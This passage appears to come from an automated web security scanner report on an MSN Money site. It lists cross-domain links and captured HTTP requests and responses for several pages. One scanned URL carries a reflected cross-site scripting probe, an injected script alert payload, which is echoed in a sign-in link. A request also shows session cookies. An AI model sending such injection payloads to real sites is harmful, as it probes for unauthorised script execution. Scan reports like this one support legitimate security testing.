http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/finance/stockscreener
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3
http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3
http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3
http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3
http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3
http://www.bing.com/search?q=why+oil+prices+so+volatile+2011&form=pt10
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.briefing.com/
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296350882&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Finvesting%3F4755d%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E10ee24922f0%3D1&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=VimMKAiW&resize=false

Request

Response

22.199. http://money.redacted/investing previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/investing

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/investing?4755d%22%3E%3Cscript%3Ealert(1)%3C/script%3E10ee24922f0=1

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/finance/stockscreener
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3
http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3
http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3
http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3
http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3
http://www.bing.com/search?q=why+oil+prices+so+volatile+2011&form=pt10
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.briefing.com/
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296351991&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Finvesting%3F4755d%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E10ee24922f0%3D1&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=VimMKAiW&resize=false

Request

Response

22.200. http://money.redacted/market-news/post.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/market-news/post.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://cid-4ce946f01e0695ce.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-72bd862dcafebd15.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110128192402_charlie-blaine-164-b.jpg
http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://us.social.s-msn.com/s/images/bluemannxl.png
http://us.social.s-msn.com/s/images/emoticons/72_72.gif
http://us.social.s-msn.com/s/images/emoticons/75_75.gif
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3
http://www.bing.com/search?q=history+of+the+gold+standard&form=MONEY3
http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3
http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3
http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3
http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.slate.com/id/2282620?ocid=xnetr2-4
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353377&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fmarket-news%2Fpost.aspx%3Fpost%3Dfaf89f05-0560-4409-bafb-7a02dc2c6cb5&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

GET /market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:09:36 GMT
Content-Length: 114372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353377&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fmarket-news%2Fpost.aspx%3Fpost%3Dfaf89f05-0560-4409-bafb-7a02dc2c6cb5&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<div class="pst_bod" id="abody"><img src="http://media.social.s-redacted/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110128192402_charlie-blaine-164-b.jpg" alt="Charley Blaine" class="imagefloatleft userImage lead" />A week ago, the question was whether the stock market was about to pull back substantially. The answer seemed to be yes. But a pullback was likely to be short and intense. <br />
...[SNIP]...
lBinary', 'True','1');" href="http://money.msn.com/market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
y', 'True','0');" href="http://money.msn.com/market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X19kLPwdz5sB2Fnf9yuXWOdr9kOtEAGL6?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xnro6l_39mWfG4y1hE7LEgx_WqLpHdupL?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XhfDJa04FoRujoDJi4C1LEoyMkBUSqiKS?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xj0dHfUYtwaLtz5YCWnr-VnjhGC9rBkYC?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-72bd862dcafebd15.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Someone
..(jewcanu)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-72bd862dcafebd15.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
;has a nice job. He never really commits to an answer and is much like a weatherman. Guess at the forecast as if they are wrong no one really cares. I guess that&#39;s why they call it forecasting.<img src="http://us.social.s-redacted/s/images/emoticons/72_72.gif" alt="Thinking" class="emoticon" /></div>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XJtNqJBT2IezhkgeuRuClb2a_4QPIhAFx?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XJtNqJBT2IezhkgeuRuClb2a_4QPIhAFx?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xpo_Bpo7oVutnP7wu82moHfnsEkcGreBB?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
s (all forms of government), will eventually always pay with blood. Keep it up corporate America and U.S. government and you will be next! This lesson in history will be learned? NEVER! Stupid people! <img src="http://us.social.s-redacted/s/images/emoticons/75_75.gif" alt="Eye-rolling" class="emoticon" /></div>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-4ce946f01e0695ce.profile.live.com/msn/posts?mkt=en-US&domain=en-US">David N</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-4ce946f01e0695ce.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XhfDJa04FoRujoDJi4C1LEoyMkBUSqiKS?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X7Rw25xaqP2g6YCmuYWLOzevigGiy9msi?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xpo_Bpo7oVutnP7wu82moHfnsEkcGreBB?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
ck markets? Buying, selling, gambling, lying, stealing, deceiving, manipulating, cutthroating, back stabbing and head chopping,.... you know, the usual routine that goes on everyday at "Fraud Street". <img src="http://us.social.s-redacted/s/images/emoticons/75_75.gif" alt="Eye-rolling" class="emoticon" /></div>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xq0tm3KzL1oq6JFh44a58UPpPNYNAeqHB?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XSN8F5eJocNcl3QJnJ85WhK7gl5LCHOLY?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XS98j_oegJAb0IvDZ9ZtLLsKvWvLQM86S?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3" class="opennew">How to file your taxes electronically</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3" class="opennew">Is your smart phone safe from ID thieves?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3" class="opennew">Cars with the highest resale value</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3" class="opennew">Surprising things home insurance doesn't cover</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3" class="opennew">How to convert a traditional IRA to a Roth</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=history+of+the+gold+standard&form=MONEY3" class="opennew">The history of the gold standard</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.201. http://money.redacted/market-news/post.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/market-news/post.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://cid-4ce946f01e0695ce.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-72bd862dcafebd15.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110128192402_charlie-blaine-164-b.jpg
http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://us.social.s-msn.com/s/images/bluemannxl.png
http://us.social.s-msn.com/s/images/emoticons/72_72.gif
http://us.social.s-msn.com/s/images/emoticons/75_75.gif
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3
http://www.bing.com/search?q=history+of+the+gold+standard&form=MONEY3
http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3
http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3
http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3
http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.slate.com/id/2282620?ocid=xnetr2-4
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344875&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fmarket-news%2Fpost.aspx%3Fpost%3Dfaf89f05-0560-4409-bafb-7a02dc2c6cb5&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=4b5bf39f834647489c4c910da85e7265; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:47:55 GMT
Content-Length: 110702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344875&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fmarket-news%2Fpost.aspx%3Fpost%3Dfaf89f05-0560-4409-bafb-7a02dc2c6cb5&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<div class="pst_bod" id="abody"><img src="http://media.social.s-redacted/images/blogs/00120065-0000-0000-0000-000000000000_00000065-0690-0000-0000-000000000000_20110128192402_charlie-blaine-164-b.jpg" alt="Charley Blaine" class="imagefloatleft userImage lead" />A week ago, the question was whether the stock market was about to pull back substantially. The answer seemed to be yes. But a pullback was likely to be short and intense. <br />
...[SNIP]...
lBinary', 'True','1');" href="http://money.msn.com/market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
y', 'True','0');" href="http://money.msn.com/market-news/post.aspx?post=faf89f05-0560-4409-bafb-7a02dc2c6cb5&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xj0dHfUYtwaLtz5YCWnr-VnjhGC9rBkYC?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-72bd862dcafebd15.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Someone
..(jewcanu)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-72bd862dcafebd15.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
;has a nice job. He never really commits to an answer and is much like a weatherman. Guess at the forecast as if they are wrong no one really cares. I guess that&#39;s why they call it forecasting.<img src="http://us.social.s-redacted/s/images/emoticons/72_72.gif" alt="Thinking" class="emoticon" /></div>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XJtNqJBT2IezhkgeuRuClb2a_4QPIhAFx?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XJtNqJBT2IezhkgeuRuClb2a_4QPIhAFx?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xpo_Bpo7oVutnP7wu82moHfnsEkcGreBB?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
s (all forms of government), will eventually always pay with blood. Keep it up corporate America and U.S. government and you will be next! This lesson in history will be learned? NEVER! Stupid people! <img src="http://us.social.s-redacted/s/images/emoticons/75_75.gif" alt="Eye-rolling" class="emoticon" /></div>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-4ce946f01e0695ce.profile.live.com/msn/posts?mkt=en-US&domain=en-US">David N</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-4ce946f01e0695ce.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XhfDJa04FoRujoDJi4C1LEoyMkBUSqiKS?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X7Rw25xaqP2g6YCmuYWLOzevigGiy9msi?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
